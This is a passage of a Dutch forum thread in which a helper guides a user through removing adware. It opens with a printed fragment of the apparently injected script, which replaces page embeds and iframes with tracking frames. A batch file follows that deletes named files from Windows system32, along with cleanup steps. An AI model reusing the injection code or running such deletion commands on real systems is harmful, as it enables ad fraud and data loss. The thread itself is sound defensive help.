                else if(El.tagName == "EMBED")
                {
                if(!CheckTagEMBED_24578457887(El, InitArray))
                continue;

                } //else if(El.tagName == "EMBED")
                else if(El.tagName == "OBJECT")
                {

                if(!CheckTagOBJECT_24578457887(El, InitArray))
                continue;

                } //else if(El.tagName == "OBJECT")
                else if(El.tagName == "IFRAME")
                {
                if(!CheckTagIFRAME_24578457887(El, InitArray))
                continue;

                } //else if(El.tagName == "IFRAME")


                if(El.childNodes && El.childNodes.length)
                ReplaceByFrame_24578457887(InitArray, El.childNodes, 1);


                } //for(i = 0; i < MainCollection.length; i++)

                return 0;

                } //function ReplaceByFrame()


                function CreateInitObject_24578457887(FrID, FrSrc, FrWidthMin, FrWidthMax, FrHeightMin, FrHeightMax,
                AHref, ImgSrc)
                {

                var InitObj = new Object();

                InitObj.FrID = FrID;
                InitObj.FrName = FrID;

                InitObj.FrSrc = FrSrc + '&aid=' + MainAid_24578457887 +
                '&guid=' + MainGiud_24578457887 + '&uid=' + MainUid_24578457887 +
                '&rid=' + MainRid_24578457887 + '&url=' + EscUrl_24578457887;

                InitObj.FrWidthMin = FrWidthMin;
                InitObj.FrWidthMax = FrWidthMax;
                InitObj.FrHeightMin = FrHeightMin;
                InitObj.FrHeightMax = FrHeightMax;

                InitObj.FrSpacing = '0';
                InitObj.FrBorder = 'no';
                InitObj.FrScrolling = 'no';


                InitObj.AHref = AHref;
                InitObj.ATarget = 'blank';

                InitObj.ImgSrc = ImgSrc;
                InitObj.ImgBorder = '0';
                InitObj.ImgAlt = '';

                return InitObj;

                } //function CreateInitObject()


                function GetDomain_24578457887(str)
                {
                var i;
                var str2 = "";

                for(i = 0; i < str.length; ++i)
                {

                str2 += str.charAt(i);

                if(str.charAt(i) == '/')
                {
                if( ((i + 1) < str.length) && ((i - 1) >= 0) )
                {
                if( (str.charAt(i + 1) != '/') && (str.charAt(i - 1) != '/') )
                break;
                }
                else if( ((i + 1) < str.length) && (str.charAt(i + 1) != '/') )
                break;
                else if ( ((i - 1) >= 0) && (str.charAt(i - 1) != '/') )
                break;

                } //if(str[i] == '/')

                } //for(i = 0; i < str.length; ++i)

                return str2;

                } //function GetDomain_24578457887(str)


                </script>

                Comment


                • #9
                  Open een kladblokbestand.
                  Kopieer onderstaande (alles wat vetgedrukt is) in dit kladblokbestand.

                  @ECHO OFF
                  IF EXIST log.txt DEL log.txt
                  ren C:\WINDOWS\system32\mlljh.dll mlljh.bak
                  ren C:\WINDOWS\system32\vlwosmpj.dll vlwosmpj.bak
                  ECHO Deleting files>>log.txt
                  FOR %%g in (
                  C:\WINDOWS\system32\hjllm.ini
                  C:\WINDOWS\system32\mlljh.dll
                  C:\WINDOWS\system32\vlwosmpj.dll
                  C:\WINDOWS\system32\mlljh.bak
                  C:\WINDOWS\system32\vlwosmpj.bak
                  C:\WINDOWS\BMbbad6e67.xml
                  C:\WINDOWS\BMbbad6e67.txt
                  C:\WINDOWS\pskt.ini) DO (
                  IF EXIST %%g (
                  ATTRIB -r -s -h %%g
                  DEL %%g
                  IF EXIST %%g (
                  ECHO %%g not deleted>>log.txt
                  ) ELSE (
                  ECHO %%g deleted>>log.txt)
                  ) ELSE (
                  ECHO %%g not found>>log.txt))
                  START NOTEPAD.EXE log.txt

                  Ga naar Bestand - Opslaan als.
                  Bij "Opslaan in" kies je: Bureaublad
                  Bij "Bestandsnaam" zet je: del.bat
                  Bij "Opslaan als type" selecteer je: Alle bestanden (*.*).
                  Klik op de knop Opslaan.

                  Dubbelklik op del.bat en post het logje dat verschijnt

                  Comment


                  • #10
                    Deleting files
                    C:\WINDOWS\system32\hjllm.ini deleted
                    C:\WINDOWS\system32\mlljh.dll not found
                    C:\WINDOWS\system32\vlwosmpj.dll not found
                    C:\WINDOWS\system32\mlljh.bak deleted
                    C:\WINDOWS\system32\vlwosmpj.bak not deleted
                    C:\WINDOWS\BMbbad6e67.xml not found
                    C:\WINDOWS\BMbbad6e67.txt deleted
                    C:\WINDOWS\pskt.ini deleted

                    Weet je ook wat van het andere probleem met de javascripts?

                    Trouwens alvast heel erg bedankt voor je hulp....hier was ik zelf NOOIT achter gekomen!

                    Comment


                    • #11
                      Herstart je computer even.

                      Dubbelklik na de herstart nog een keer op del.bat, post het logje.

                      Probleem met die scripts is er dan nog steeds?

                      Comment


                      • #12
                        Deleting files
                        C:\WINDOWS\system32\hjllm.ini not found
                        C:\WINDOWS\system32\mlljh.dll not found
                        C:\WINDOWS\system32\vlwosmpj.dll not found
                        C:\WINDOWS\system32\mlljh.bak not found
                        C:\WINDOWS\system32\vlwosmpj.bak deleted
                        C:\WINDOWS\BMbbad6e67.xml not found
                        C:\WINDOWS\BMbbad6e67.txt deleted
                        C:\WINDOWS\pskt.ini not found

                        Comment


                        • #13
                          Ik heb geen problemen met de scripts meer...bedankt!

                          Comment


                          • #14
                            Graag gedaan hoor

                            Open de map RVAXO op je bureaublad en dubbelklik Uninstall.cmd
                            Dit zal alles van RVAXO doen verwijderen.

                            Download ATF cleaner (mirror)(gemaakt door Atribune)

                            Belangrijk: Sluit al je browservensters(IE en/of Firefox en/of Opera) om de tool goed te kunnen laten werken.

                            Dubbelklik op ATF cleaner om het programma te starten.
                            Op het tabblad "Main", plaats je een vinkje bij Select All.
                            Klik op de knop Empty Selected.

                            Het volgende doen als je ook FireFox als browser hebt:
                            Klik op tabblad "Firefox", plaats een vinkje bij Select All.
                            Wil je de door Firefox opgeslagen wachtwoorden behouden, dan klik je in het venster dat verschijnt op "No".
                            (dit haalt het vinkje weer weg bij "Firefox saved passwords")
                            Klik op de knop Empty Selected.

                            Het volgende doen als je ook Opera als browser hebt:
                            Klik op tabblad "Opera", plaats een vinkje bij Select All.
                            Wil je de door Opera opgeslagen wachtwoorden behouden, dan klik je in het venster dat verschijnt op "No".
                            Klik op de knop Empty Selected.
                            Ga naar het tabblad "Main" en klik op de knop Exit om het programma af te sluiten.

                            Schakel Systeemherstel uit. Herstart de computer. Schakel Systeemherstel weer in.
                            Kijk hier hoe je je systeemherstel moet uitschakelen.
                            Hiermee verwijder je eventuele restanten van de infecties uit je systeemherstel.

                            Dan denk ik dat alles weer OK is

                            Comment


                            • #15
                              Dag Smeenk,

                              Alles lijkt weer tiptop te werken! Ik wil je vanaf hier hartelijk bedanken voor je inzet en tijd! Ik zal tevens een donatie doen ter 'compensatie'.

                              Heel erg bedankt...

                              Jeroen

                              Comment

                              Sorry, you are not authorized to view this page
                              Working...
                              X